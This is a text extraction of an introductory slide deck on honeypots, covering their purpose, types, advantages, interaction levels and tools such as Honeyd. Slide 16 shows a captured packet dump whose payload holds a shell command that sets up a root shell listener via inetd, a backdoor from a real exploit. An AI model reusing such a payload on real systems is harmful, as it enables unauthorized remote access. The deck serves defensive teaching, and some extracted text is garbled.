to introduce you to honeypots, what they

8/14/2019 To Introduce You to Honeypots, What They

1/33

Honeypots


2/33

Purpose

To introduce you to honeypots, what they

are, how they work, their value.


3/33

Definition

Any security resource whos value lies in beingprobed, attacked, or compromised


4/33

How honeypots work

Simple concept

A resource that expects no data, so any

traffic to or from it is most likely

unauthorized activity


5/33

Not limited to specific purpose

Honeypots do not solve a specific problem,

instead they are a tool that contribute to your

overall security architecture.

Their value, and the problems they help solve,

depend on how build, deploy, and you usethem.


6/33

Types

Production (Law Enforcment)

Research (Counter-Intelligence)

Martys idea


7/33

Value

What is the value of honeypots?

One of the greatest areas of confusion

concerning honeypot technologies.


8/33

Advantages

Based on how honeypots conceptually

work, they have several advantages.

Reduce False Positives and False Negatives

Data Value

Resources

Simplicity


9/33

Disadvantages

Based on the concept of honeypots, they

also have disadvantages:

Narrow Field of View

Fingerprinting

Risk


10/33

Production

Prevention

Detection

Response


11/33

Prevention

Keeping the burglar out of your house.

Honeypots, in general are not effective prevention

mechanisms.

Deception, Deterence, Decoys, are phsychological

weapons. They do NOT work against automated

attacks:

worms

auto-rooters

mass-rooters


12/33

Detection

Detecting the burglar when he breaks in.

Honeypots excel at this capability, due to

their advantages.


13/33

Response

Honeypots can be used to help respond to

an incident.

Can easily be pulled offline (unlike production

systems.

Little to no data pollution.


14/33

Research Honeypots

Early Warning and Prediction

Discover new Tools and Tactics

Understand Motives, Behavior, and

Organization

Develop Analysis and Forensic Skills


15/33

Early Warning and Prediction


16/33

Tools

01/08-08:46:04.378306 10.10.10.1:3592 -> 10.10.10.2:6112

TCP TTL:48 TOS:0x0 ID:41388 IpLen:20 DgmLen:1500 DF

***AP*** Seq: 0xFEE2C115 Ack: 0x5F66192F Win: 0x3EBC TcpLen: 32

TCP Options (3) => NOP NOP TS: 463986683 4158792

30 30 30 30 30 30 30 32 30 34 31 30 33 65 30 30 0000000204103e0030 31 20 20 34 20 00 00 00 31 30 00 80 1C 40 11 01 4 ...10...@.

80 1C 40 11 10 80 01 01 80 1C 40 11 80 1C 40 11 ..@.......@...@.

80 1C 40 11 80 1C 40 11 80 1C 40 11 80 1C 40 11 ..@...@...@...@.

D0 23 FF E0 E2 23 FF E4 E4 23 FF E8 C0 23 FF EC .#...#...#...#..

82 10 20 0B 91 D0 20 08 2F 62 69 6E 2F 6B 73 68 .. ... ./bin/ksh

20 20 20 20 2D 63 20 20 65 63 68 6F 20 22 69 6E -c echo "in67 72 65 73 6C 6F 63 6B 20 73 74 72 65 61 6D 20 greslock stream

74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root

2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 22 3E 2F /bin/sh sh -i">/

74 6D 70 2F 78 3B 2F 75 73 72 2F 73 62 69 6E 2F tmp/x;/usr/sbin/

69 6E 65 74 64 20 2D 73 20 2F 74 6D 70 2F 78 3B inetd -s /tmp/x;

73 6C 65 65 70 20 31 30 3B 2F 62 69 6E 2F 72 6D sleep 10;/bin/rm

20 2D 66 20 2F 74 6D 70 2F 78 20 41 41 41 41 41 -f /tmp/x AAAAA41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA


17/33

Tactics


18/33

Motives and Behavior

J4ck: why don't you start charging for packet

attacks?

J4ck: "give me x amount and I'll take bla bla offline

for this amount of time"J1LL: it was illegal last I checked.

J4ck: heh, then everything you do is illegal. Why not

make money off of it?

J4ck:I know plenty of people that'd pay exorbatent

amounts for packeting.


19/33

Level of Interaction

Level of Interaction determines amount of

functionality a honeypot provides.

The greater the interaction, the more you

can learn.

The greater the interaction, the more

complexity and risk.


20/33

Risk

Chance that an attacker can use your

honeypot to harm, attack, or infiltrate other

systems or organizations.


21/33

Low Interaction

Provide Emulated Services

No operating system for attacker to access.

Information limited to transactional

information and attackers activities with

emulated services.


22/33

High Interaction

Provide Actual Operating Systems

Learn extensive amounts of information.

Extensive risk.


23/33

Honeypots

BackOfficer Friendly

http://www.nfr.com/products/bof/

SPECTER http://www.specter.com

Honeyd http://www.citi.umich.edu/u/provos/honeyd/

ManTrap

http://www.recourse.com

Honeynets http://project.honeynet.org/papers/honeynet/

LowInteraction

HighInteraction


24/33

BackOfficer Friendly


25/33

Specter


26/33

Honeyd

create default

set default personality "FreeBSD 2.2.1-STABLE"

set default default action open

add default tcp port 80 "sh /usr/local/honeyd/scripts/web.sh"

add default tcp port 22 "sh /usr/local/honeyd/scripts/test.sh"

add default tcp port 113 reset

add default tcp port 1 reset

create windows

set windows ersonalit "Windows NT 4.0 Server SP5-SP6"


27/33

ManTrap


28/33

Honeynets


29/33

Which is best?

None, they all have their advantages anddisadvantages. It depends on what you are

attempting to achieve.


30/33


31/33

Legal Contact for

.mil / .gov

Department of Justice, Computer Crime and

Intellectual Property Section

General Number: (202) 514-1026Specific Contact: Richard Salgado

Direct Telephone (202) 353-7848

E-Mai: [email protected]
mailto:[email protected]:[email protected]


32/33

Summary

Honeypos are a highly flexible security tool

that can be used in a variety of different

deployments.


33/33

Resources

Honeypots: Tracking Hackers

http://www.tracking-hackers.com

to introduce you to honeypots, what they

Documents